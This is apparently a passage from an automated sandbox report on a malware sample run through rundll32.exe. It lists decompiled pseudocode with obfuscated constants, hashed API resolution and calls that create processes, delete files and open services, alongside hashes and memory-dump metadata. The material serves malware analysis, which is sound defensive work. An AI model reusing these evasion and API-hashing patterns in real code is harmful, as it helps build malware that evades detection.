
[, xrefs: 001C103B

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 267db4ec8a45fb042d442dc1b53de923e2eb3456c53a142c12376804bcad5b54
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: D4015BB6D01309BBDF04DF94C94AADEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001C4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001C4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001c485e
0x001c487a
0x001c487d
0x001c4884
0x001c488b
0x001c4892
0x001c489d
0x001c48a0
0x001c48ad
0x001c48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001C48B7

Strings

[, xrefs: 001C488B

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 7377322ec9344d54c853e61200a895c2bc2dd60802e3a37876cf597f10c2dc1a
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 65F017B0A05209FBDB04CFE8CA56A9EBFB9EB40301F20818DE444BB290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001D4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E001D4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x001d4f80
0x001d4f81
0x001d4f82
0x001d4f86
0x001d4f87
0x001d4f8c
0x001d4fa5
0x001d4fa8
0x001d4faf
0x001d4fb6
0x001d4fc7
0x001d4fca
0x001d4fd7
0x001d4fe2
0x001d4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 001D4FE2

Strings

{#lm, xrefs: 001D4FC2

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 70ce5f5857b820ecea6aa23e17461251b8ac204e3de28d7e16916df4293305e4
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: CAF037B081120CFFDB04DFA4D94289EBFBAEB44300F208199E808BB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 001D976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

APIs

CreateProcessW.KERNEL32(001C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001C591A), ref: 001D9816

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 20f21d30f10ae6234dd47c65ab3716d7b13978f2ef040c719a6d235505af61fe
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: F611B372901149BBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001CB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001C602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

APIs

CreateFileW.KERNELBASE(001D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001D0668,?,?,?,?), ref: 001CB5FD

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6474b0b056dd1446ba0cbdb78db585d44b3762dc5b9c736ac2795f5da4ed1508
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 6911B272801248BBDF16DF95DD06CEE7F7AEF99314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E001D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001C87F2,0000CAAE,0000510C,AD82F196), ref: 001D989B

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: f305e31e9dddd463da641a55f8577ef9c24a19b2ea253f52b3322e46062ad1e3
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: A0019A72801208FBDB04EFD5D846CDFBF79EF95310F10818DF908A6220E6719B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001D7C67

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 2d453b1998db545c22669fdb2669d10e8b11c72ef14dc62f7d17afb6ab6d0142
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: A1014FB190120CFFEB09DF94C84A9DE7BB5EF54314F108199F40567240E7B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001CF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001CF6D8

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 686296c243c948e16beda9c536ee708d4800bb1dd8449823ec2bc158ed88f8f1
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 7F01E5B6901208BBEF059F94DC068DF7F75EB15324F148188F90466250D7B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001C602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001cb6f3
0x001cb6f8
0x001cb702
0x001cb70b
0x001cb712
0x001cb719
0x001cb720
0x001cb727
0x001cb72e
0x001cb747
0x001cb759
0x001cb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001CB759

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: e280783abebfdd0d7976eaa09f3e3ca5bebcf510c298a9fb58a3a29206bd1b3c
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: AC012CB5941308FBEB45DF94DD06E9E7BB5EB18704F108188FA0966190D3B15A209B51

Uniqueness

Uniqueness Score: -1.00%

Function 001DAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x001daa3f
0x001daa40
0x001daa41
0x001daa44
0x001daa47
0x001daa4b
0x001daa4c
0x001daa51
0x001daa5b
0x001daa64
0x001daa68
0x001daa6f
0x001daa76
0x001daa8d
0x001daa90
0x001daa9d
0x001daaa8
0x001daaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001DAAA8

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: d71e1bd8c9314d0d27f14770b55a8437bc9751afcd0c6fc663724ab07285f57b
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 89F069B190020CFFDF08DF94DD4A99EBFB4EB44304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001C5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001C602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001c5fb5
0x001c5fb6
0x001c5fb7
0x001c5fbb
0x001c5fbc
0x001c5fc1
0x001c5fcb
0x001c5fd7
0x001c5fde
0x001c5fe5
0x001c5ffc
0x001c5fff
0x001c6006
0x001c600d
0x001c601a
0x001c6025
0x001c602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001C6025

Memory Dump Source

Source File: 0000000D.00000002.2097402342.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000D.00000002.2097386282.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2097431813.00000000001DC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: fcccdb7cf7845b0c87996f2184252aef1b0ae999b48dde9af7d4ec08dfa39e49
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 28F04FB0C11208FFDB08DFA0E94689EBFB8EB50300F20819CE409A7260E7B19F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2780 Parent PID: 2408 rundll32.exeCOMMON

Executed Functions

Function 00392959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00392959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0039602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E003A07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0039295f
0x00392964
0x00392967
0x0039296a
0x0039296d
0x0039296e
0x0039296f
0x00392977
0x00392985
0x0039298a
0x00392992
0x0039299a
0x003929a2
0x003929a9
0x003929b0
0x003929b7
0x003929bb
0x003929cf
0x003929dc
0x003929e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 003929DC

Strings

<^, xrefs: 00392977

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 1238fe6be1fbc81680a6d6e4a7ea9152f91da08f343fba61238f6d22bdb186ee
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 96018072A01108BFEB18DF95DC4A8DFBFB6EF45310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0039C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0039C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0039602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E003A07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0039c6e1
0x0039c6e6
0x0039c6f0
0x0039c6fc
0x0039c703
0x0039c706
0x0039c70d
0x0039c711
0x0039c715
0x0039c71c
0x0039c723
0x0039c72a
0x0039c731
0x0039c738
0x0039c751
0x0039c762
0x0039c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0039C762

Strings

/O, xrefs: 0039C6E6

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: fe35f3f00aa1cffcb571c6c03f250bb25fdd5455c0d3da273518b1fa4312c8db
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: B21122B290122DBBCB259F94DC4A8DFBEB8EF05714F108188B90966210D3714A659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00391000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00391000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0039602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E003A07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00391006
0x00391009
0x0039100c
0x00391011
0x00391016
0x0039101d
0x00391026
0x0039102d
0x00391034
0x0039103b
0x00391047
0x0039104f
0x00391057
0x0039105e
0x00391065
0x0039106c
0x00391073
0x00391077
0x0039108b
0x00391096
0x0039109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00391096

Strings

[, xrefs: 0039103B

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

